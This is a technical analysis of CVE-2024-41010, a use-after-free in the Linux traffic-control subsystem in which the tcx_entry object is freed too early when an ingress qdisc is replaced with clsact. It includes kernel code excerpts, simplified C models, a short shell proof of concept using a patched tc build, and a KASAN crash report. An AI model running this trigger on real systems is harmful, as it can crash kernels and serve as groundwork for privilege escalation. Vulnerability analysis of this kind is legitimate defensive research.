CVE-2024-41010 - Linux net/sched UAF 1-day Analysis

Introduction

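Linux Traffic Control (net/sched) is a subsystem for controlling network traffic. It offers a variety of schedulers (qdiscs) for traffic management, such as ingress and clsact. The patch "bpf: Fix too early release of tcx_entry" (CVE-2024-41010) addresses a UAF vulnerability in the net/sched subsystem caused by releasing the tcx_entry object too early.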





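The commit log already explains the issue in detail, so the rest of this post analyzes the vulnerability mainly through the code. Readers can refer to the structural overview of the ingress/clsact qdiscs provided here to understand how the private data relates to the tcx_entry object.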

Root Cause

1. Initialize Ingress Qdisc

When an ingress qdisc is added, a bpf_mprog_entry object [1] and a tcf_block object [2] are created. The mini queue pointer is also initialized so that it points to the miniq member of the tcx_entry object [3]. If the bpf_mprog_entry object was newly created, it is also bound to the net_device object (dev->tcx_ingress) [4].

    static int ingress_init(struct Qdisc *sch, struct nlattr *opt,
                            struct netlink_ext_ack *extack)
    {
        struct ingress_sched_data *q = qdisc_priv(sch);
        struct net_device *dev = qdisc_dev(sch);
        struct bpf_mprog_entry *entry;
        // [...]
        entry = tcx_entry_fetch_or_create(dev, true, &created); // [1]
        tcx_miniq_set_active(entry, true);
        mini_qdisc_pair_init(&q->miniqp, sch, &tcx_entry(entry)->miniq); // [3]
        tcx_entry_update(dev, entry, true); // [4]
        err = tcf_block_get_ext(&q->block, sch, &q->block_info, extack); // [2]
        // [...]
    }
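The aliasing that matters later can be sketched in userspace C. This is only a simplified model, not kernel code: the `*_model` structs, their fields, and the helper names are assumptions made for illustration. It shows that the second qdisc initialized on the same device fetches the existing entry, so both private data areas end up pointing at the same miniq slot.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdlib.h>

/* Simplified stand-ins for the kernel objects; the field sets are assumptions. */
struct mini_qdisc { int dummy; };

struct tcx_entry_model {
    struct mini_qdisc *miniq;   /* slot the qdisc's mini queue pair points at */
    bool miniq_active;
};

struct net_device_model {
    struct tcx_entry_model *tcx_ingress;   /* models dev->tcx_ingress */
};

struct qdisc_priv_model {
    struct mini_qdisc **p_miniq;   /* models the pointer kept in the miniq pair */
};

/* Return the device's existing entry, or allocate one and report it via *created. */
static struct tcx_entry_model *
entry_fetch_or_create(struct net_device_model *dev, bool *created)
{
    *created = false;
    if (dev->tcx_ingress)
        return dev->tcx_ingress;
    *created = true;
    return calloc(1, sizeof(struct tcx_entry_model));
}

/* Models the init path: wire the qdisc private data to the entry. */
static int qdisc_init_model(struct net_device_model *dev,
                            struct qdisc_priv_model *q)
{
    bool created;
    struct tcx_entry_model *entry = entry_fetch_or_create(dev, &created);

    if (!entry)
        return -1;
    entry->miniq_active = true;
    q->p_miniq = &entry->miniq;
    if (created)
        dev->tcx_ingress = entry;   /* bind only a newly created entry */
    return 0;
}

/* Returns true when two qdiscs on one device alias the same miniq slot. */
bool two_qdiscs_share_entry(void)
{
    struct net_device_model dev = { NULL };
    struct qdisc_priv_model ingress = { NULL }, clsact = { NULL };
    bool shared;

    if (qdisc_init_model(&dev, &ingress) || qdisc_init_model(&dev, &clsact))
        return false;
    shared = (ingress.p_miniq == clsact.p_miniq);
    free(dev.tcx_ingress);
    return shared;
}
```

Calling two_qdiscs_share_entry() from a small test program is enough to see the sharing; the model leaves out RTNL locking and RCU.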

If a non-zero index is supplied when the block is created [5], the block is treated as a shared block and is additionally recorded in the idr table under the per-network-namespace object tcf_net [6].

    int tcf_block_get_ext(struct tcf_block **p_block, struct Qdisc *q,
                          struct tcf_block_ext_info *ei,
                          struct netlink_ext_ack *extack)
    {
        struct net *net = qdisc_net(q);
        struct tcf_block *block = NULL;
        int err;

        if (ei->block_index) // [5]
            block = tcf_block_refcnt_get(net, ei->block_index);
        if (!block) {
            block = tcf_block_create(net, q, ei->block_index, extack);
            // [...]
            if (tcf_block_shared(block)) {
                err = tcf_block_insert(block, net, extack); // [6]
            }
        }
        // [...]
    }
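The lookup-or-create flow for shared blocks can be modeled roughly as follows. This is a minimal sketch under stated assumptions: a fixed-size array stands in for the idr table, and `block_model`, `net_model`, and the function names are hypothetical. Index 0 always yields a fresh private block, while a non-zero index returns the already registered block with its reference count bumped.

```c
#include <assert.h>
#include <stddef.h>
#include <stdlib.h>

#define MAX_BLOCKS 8   /* arbitrary table size for this sketch */

struct block_model {
    unsigned int index;    /* 0 means private (unshared) */
    unsigned int refcnt;
};

/* Stand-in for the per-netns idr table that tracks shared blocks. */
struct net_model {
    struct block_model *shared[MAX_BLOCKS];
};

/* Look up a shared block by index and take a reference, or return NULL. */
static struct block_model *block_refcnt_get(struct net_model *net,
                                            unsigned int index)
{
    if (index >= MAX_BLOCKS || !net->shared[index])
        return NULL;
    net->shared[index]->refcnt++;
    return net->shared[index];
}

/* Models the overall flow: reuse a shared block or create a new one. */
struct block_model *block_get(struct net_model *net, unsigned int index)
{
    struct block_model *block = NULL;

    if (index)
        block = block_refcnt_get(net, index);
    if (!block) {
        block = calloc(1, sizeof(*block));
        if (!block)
            return NULL;
        block->index = index;
        block->refcnt = 1;
        if (index && index < MAX_BLOCKS)
            net->shared[index] = block;   /* record the shared block */
    }
    return block;
}

/* Returns 1 if two requests for index 1 yield the same block with refcnt 2. */
int shared_block_demo(void)
{
    struct net_model net = { { NULL } };
    struct block_model *a = block_get(&net, 1);
    struct block_model *b = block_get(&net, 1);
    int ok = a && a == b && a->refcnt == 2;

    free(a);
    return ok;
}
```

In the PoC, both qdiscs are created with ingress_block 1, which corresponds to the two block_get(&net, 1) calls in the demo.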

2. Attach Chain0 to Block1

tc_ctl_chain() adds a chain to the block with the specified index. When the chain index is 0 [1], the chain is treated as the block's chain head, i.e. chain0 [2].

    static struct tcf_chain *tcf_chain_create(struct tcf_block *block,
                                              u32 chain_index)
    {
        struct tcf_chain *chain;

        chain = kzalloc(sizeof(*chain), GFP_KERNEL);
        // [...]
        chain->refcnt = 1;
        if (!chain->index) // [1]
            block->chain0.chain = chain; // [2]
        return chain;
    }
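Why chain0 matters for the PoC can be illustrated with a small model. The sketch assumes, based on a reading of the kernel source rather than on anything stated in this post, that the callback removal path seen in the KASAN trace (tcf_chain0_head_change_cb_del) only notifies the qdisc when the block actually has a chain0. All struct and function names below are hypothetical simplifications, and only one callback per block is modeled.

```c
#include <assert.h>
#include <stddef.h>

struct chain_model { unsigned int index; };

typedef void (*head_change_fn)(void *new_head, void *priv);

struct block_model {
    struct chain_model *chain0;    /* models block->chain0.chain */
    head_change_fn head_change;    /* one registered callback, for brevity */
    void *head_change_priv;
};

/* Models the chain creation step: only index 0 becomes the chain head. */
static void chain_attach(struct block_model *block, struct chain_model *chain)
{
    if (!chain->index)
        block->chain0 = chain;
}

/* Models callback removal on block put: notify only if chain0 exists. */
static void head_change_cb_del(struct block_model *block)
{
    if (block->chain0 && block->head_change)
        block->head_change(NULL, block->head_change_priv);
    block->head_change = NULL;
}

/* Hypothetical callback that just counts how often it runs. */
static void count_calls(void *new_head, void *priv)
{
    (void)new_head;
    ++*(int *)priv;
}

/* Returns how many times the callback fires on unbind for a chain index. */
int callbacks_on_unbind(unsigned int chain_index)
{
    int calls = 0;
    struct chain_model chain = { chain_index };
    struct block_model block = { NULL, count_calls, &calls };

    chain_attach(&block, &chain);
    head_change_cb_del(&block);
    return calls;
}
```

In the real kernel the callback ends up in mini_qdisc_pair_swap(), which touches the miniq slot. Under this model, a block without chain0 would never reach that access on teardown.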

3. Graft Clsact Qdisc to Old One

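Under certain conditions, tc_modify_qdisc() accepts a replace between two qdiscs of different types. If the requested class ID is TC_H_INGRESS, it first creates a new qdisc object [1] and, at the end, grafts it in place of the old one (replace) [2].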

    static int tc_modify_qdisc(struct sk_buff *skb, struct nlmsghdr *n,
                               struct netlink_ext_ack *extack)
    {
        // [...]
        if (clid == TC_H_INGRESS) {
            if (dev_ingress_queue(dev)) {
                q = qdisc_create(dev, dev_ingress_queue(dev), // [1]
                                 tcm->tcm_parent, tcm->tcm_parent,
                                 tca, &err, extack);
            }
            // [...]
        }
        err = qdisc_graft(dev, p, skb, n, clid, q, NULL, extack); // [2]
        // [...]
    }

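Initializing the clsact qdisc follows roughly the same flow as ingress. However, because the relevant objects were already created in step "1. Initialize Ingress Qdisc", clsact obtains the same tcx_entry object as ingress [3] as well as the shared tcf_block object [4].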

    static int clsact_init(struct Qdisc *sch, struct nlattr *opt,
                           struct netlink_ext_ack *extack)
    {
        // [...]
        entry = tcx_entry_fetch_or_create(dev, true, &created); // [3]
        // [...]
        mini_qdisc_pair_init(&q->miniqp_ingress, sch, &tcx_entry(entry)->miniq);
        // [...]
        err = tcf_block_get_ext(&q->ingress_block, sch, &q->ingress_block_info, // [4]
                                extack);
        // [...]
    }

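Later, when qdisc_graft() performs the graft, it calls qdisc_destroy() to delete the old ingress qdisc, which ends up in ingress_destroy(). That function, however, simply marks the bpf_mprog_entry object as inactive [5] and frees it [6], even though the new clsact qdisc can still reference it through miniqp_ingress. The result is a UAF.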

    static void ingress_destroy(struct Qdisc *sch)
    {
        // [...]
        struct bpf_mprog_entry *entry = rtnl_dereference(dev->tcx_ingress);
        // [...]
        if (entry) {
            tcx_miniq_set_active(entry, false); // [5]
            if (!tcx_entry_is_active(entry)) {
                tcx_entry_update(dev, NULL, true);
                tcx_entry_free(entry); // [6]
            }
        }
        // [...]
    }
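The lifetime problem boils down to a single active flag being shared by two users. The following userspace sketch contrasts that with a counter, which is, as far as this sketch assumes, the direction the upstream fix takes. The struct, its fields, and the function names are hypothetical; attached BPF programs, which also keep an entry active in the kernel, are ignored, and a `freed` marker replaces the real free so the example stays memory-safe.

```c
#include <assert.h>
#include <stdbool.h>

struct entry_model {
    bool miniq_active;          /* flag used by the vulnerable logic */
    unsigned int miniq_users;   /* counter used by the alternative logic */
    bool freed;                 /* set instead of calling free() */
};

/* Flag-based teardown: any single user clears the flag and frees the entry. */
static void destroy_with_flag(struct entry_model *e)
{
    e->miniq_active = false;
    if (!e->miniq_active)
        e->freed = true;
}

/* Counter-based teardown: only the last user frees the entry. */
static void destroy_with_counter(struct entry_model *e)
{
    if (--e->miniq_users == 0)
        e->freed = true;
}

/* Both qdiscs attach, then the graft destroys the old ingress qdisc. */
bool entry_freed_while_in_use(bool use_counter)
{
    struct entry_model e = { false, 0, false };

    /* ingress init */
    e.miniq_active = true;
    e.miniq_users++;
    /* clsact init on the same entry */
    e.miniq_active = true;
    e.miniq_users++;

    /* the graft tears down the old ingress qdisc */
    if (use_counter)
        destroy_with_counter(&e);
    else
        destroy_with_flag(&e);

    /* clsact still holds a pointer into the entry at this point */
    return e.freed;
}
```

With the flag, entry_freed_while_in_use(false) reports the entry as freed while clsact still references it; with the counter, the entry survives until the second user goes away.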

POC

    #!/bin/sh
    unshare -n sh -c """
    ./network-tools/ip link set lo up
    ./network-tools/tc qdisc add dev lo ingress_block 1 handle ffff: ingress
    ./network-tools/tc chain add block 1
    ./tc qdisc replace dev lo ingress_block 1 handle 1234: clsact
    sleep 1 # wait RCU
    """

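./network-tools/tc is the stock tc tool, while ./tc has to be a patched build of tc; otherwise the handle value cannot be controlled arbitrarily. Note that the diff lists the patched file on the "---" side, so the "-" line (the assignment commented out) is the patched state: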

    --- tc/tc_qdisc.c 2024-07-24 11:36:42.702698210 +0800
    +++ tc/tc_qdisc_orig.c 2024-07-24 11:36:38.414843027 +0800
    @@ -92,7 +92,7 @@
                 req.t.tcm_parent = TC_H_CLSACT;
                 strncpy(k, "clsact", sizeof(k) - 1);
                 q = get_qdisc_kind(k);
    -            // req.t.tcm_handle = TC_H_MAKE(TC_H_CLSACT, 0);
    +            req.t.tcm_handle = TC_H_MAKE(TC_H_CLSACT, 0);
                 NEXT_ARG_FWD();
                 break;
             } else if (strcmp(*argv, "ingress") == 0) {
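To see which handle values are involved, the macro arithmetic can be checked in isolation. The constants below mirror the definitions in linux/pkt_sched.h and are redefined here so the sketch builds without kernel headers; the two helper functions are hypothetical names added for illustration.

```c
#include <assert.h>
#include <stdint.h>

/* Values mirrored from linux/pkt_sched.h, redefined for portability. */
#define TC_H_MAJ_MASK 0xFFFF0000U
#define TC_H_MIN_MASK 0x0000FFFFU
#define TC_H_MAKE(maj, min) (((maj) & TC_H_MAJ_MASK) | ((min) & TC_H_MIN_MASK))
#define TC_H_INGRESS 0xFFFFFFF1U
#define TC_H_CLSACT TC_H_INGRESS

/* Handle that the stock tc assigns for clsact: major ffff, minor 0. */
uint32_t forced_clsact_handle(void)
{
    return TC_H_MAKE(TC_H_CLSACT, 0);
}

/* Handle for a user-supplied "MAJOR:" string such as "1234:". */
uint32_t handle_from_major(uint32_t major)
{
    return TC_H_MAKE(major << 16, 0);
}
```

The stock tool therefore always sends ffff: for clsact, the same handle the PoC gives to the ingress qdisc, whereas the patched tool lets the 1234: from the command line through.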

Below is the KASAN report produced when the vulnerability is triggered:

    [ 44.560441] BUG: KASAN: slab-use-after-free in mini_qdisc_pair_swap+0x26/0xb0
    [ 44.561275] Read of size 8 at addr ffff888003fd8000 by task kworker/u2:1/28
    [ 44.561660]
    [ 44.561930] CPU: 0 PID: 28 Comm: kworker/u2:1 Not tainted 6.7.0-rc3 #13
    [ 44.562174] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-debian-1.16.0-5 04/01/2014
    [ 44.562546] Workqueue: netns cleanup_net
    [ 44.563162] Call Trace:
    [ 44.563336] <TASK>
    [ 44.563498] dump_stack_lvl+0x32/0x40
    [ 44.563683] print_report+0xcf/0x660
    [ 44.563828] ? __virt_addr_valid+0xd0/0x150
    [ 44.563984] ? mini_qdisc_pair_swap+0x26/0xb0
    [ 44.564130] kasan_report+0xbe/0xf0
    [ 44.564275] ? mini_qdisc_pair_swap+0x26/0xb0
    [ 44.564413] mini_qdisc_pair_swap+0x26/0xb0
    [ 44.564552] ? clsact_egress_block_get+0x20/0x20
    [ 44.564693] tcf_chain0_head_change_cb_del+0xc7/0x180
    [ 44.564869] tcf_block_put_ext+0x1a/0x50
    [ 44.565020] clsact_destroy+0x96/0x3c0
    [ 44.565156] ? qdisc_reset+0x1ab/0x1c0
    [ 44.565300] __qdisc_destroy+0x54/0xc0
    [ 44.565430] dev_shutdown+0x100/0x170
    [ 44.565568] unregister_netdevice_many_notify+0x2e0/0xb00
    [ 44.565764] ? netdev_freemem+0x30/0x30
    [ 44.565899] ? unregister_netdevice_queue+0xb7/0x150
    [ 44.566057] ? unregister_netdevice_many+0x10/0x10
    [ 44.566210] ? mutex_is_locked+0x16/0x30
    [ 44.566345] default_device_exit_batch+0x28b/0x310
    [ 44.566495] ? unregister_netdev+0x20/0x20
    [ 44.566643] ? cfg80211_switch_netns+0x2c0/0x2c0
    [ 44.566814] cleanup_net+0x2c2/0x4b0
    [ 44.566955] ? peernet2id+0x40/0x40
    [ 44.567077] ? read_word_at_a_time+0xe/0x20
    [ 44.567212] ? kick_pool+0x32/0x170
    [ 44.567329] process_one_work+0x2b6/0x490
    [ 44.567479] worker_thread+0x544/0x7d0
    [ 44.567621] ? process_one_work+0x490/0x490
    [ 44.567762] kthread+0x16d/0x1b0
    [ 44.567887] ? kthread_complete_and_exit+0x20/0x20
    [ 44.568030] ret_from_fork+0x28/0x50
    [ 44.568149] ? kthread_complete_and_exit+0x20/0x20
    [ 44.568265] ret_from_fork_asm+0x11/0x20
    [ 44.568424] </TASK>
    [ 44.568562]
    [ 44.568634] Allocated by task 52:
    [ 44.569640]
    [ 44.569702] Freed by task 8:
    [ 44.570345]
    [ 44.570419] Last potentially related work creation:
    [ 44.571289]
    [ 44.571364] The buggy address belongs to the object at ffff888003fd8000
    [ 44.571364] which belongs to the cache kmalloc-2k of size 2048
    [ 44.571655] The buggy address is located 0 bytes inside of
    [ 44.571655] freed 2048-byte region [ffff888003fd8000, ffff888003fd8800)
    [ 44.571884]
    [ 44.572004] The buggy address belongs to the physical page:
    [ 44.573148]
    [ 44.573211] Memory state around the buggy address:
    [ 44.573455]  ffff888003fd7f00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
    [ 44.573628]  ffff888003fd7f80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
    [ 44.573883] >ffff888003fd8000: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
    [ 44.574048]                    ^
    [ 44.574185]  ffff888003fd8080: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
    [ 44.574354]  ffff888003fd8100: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
    [ 44.574513] ==================================================================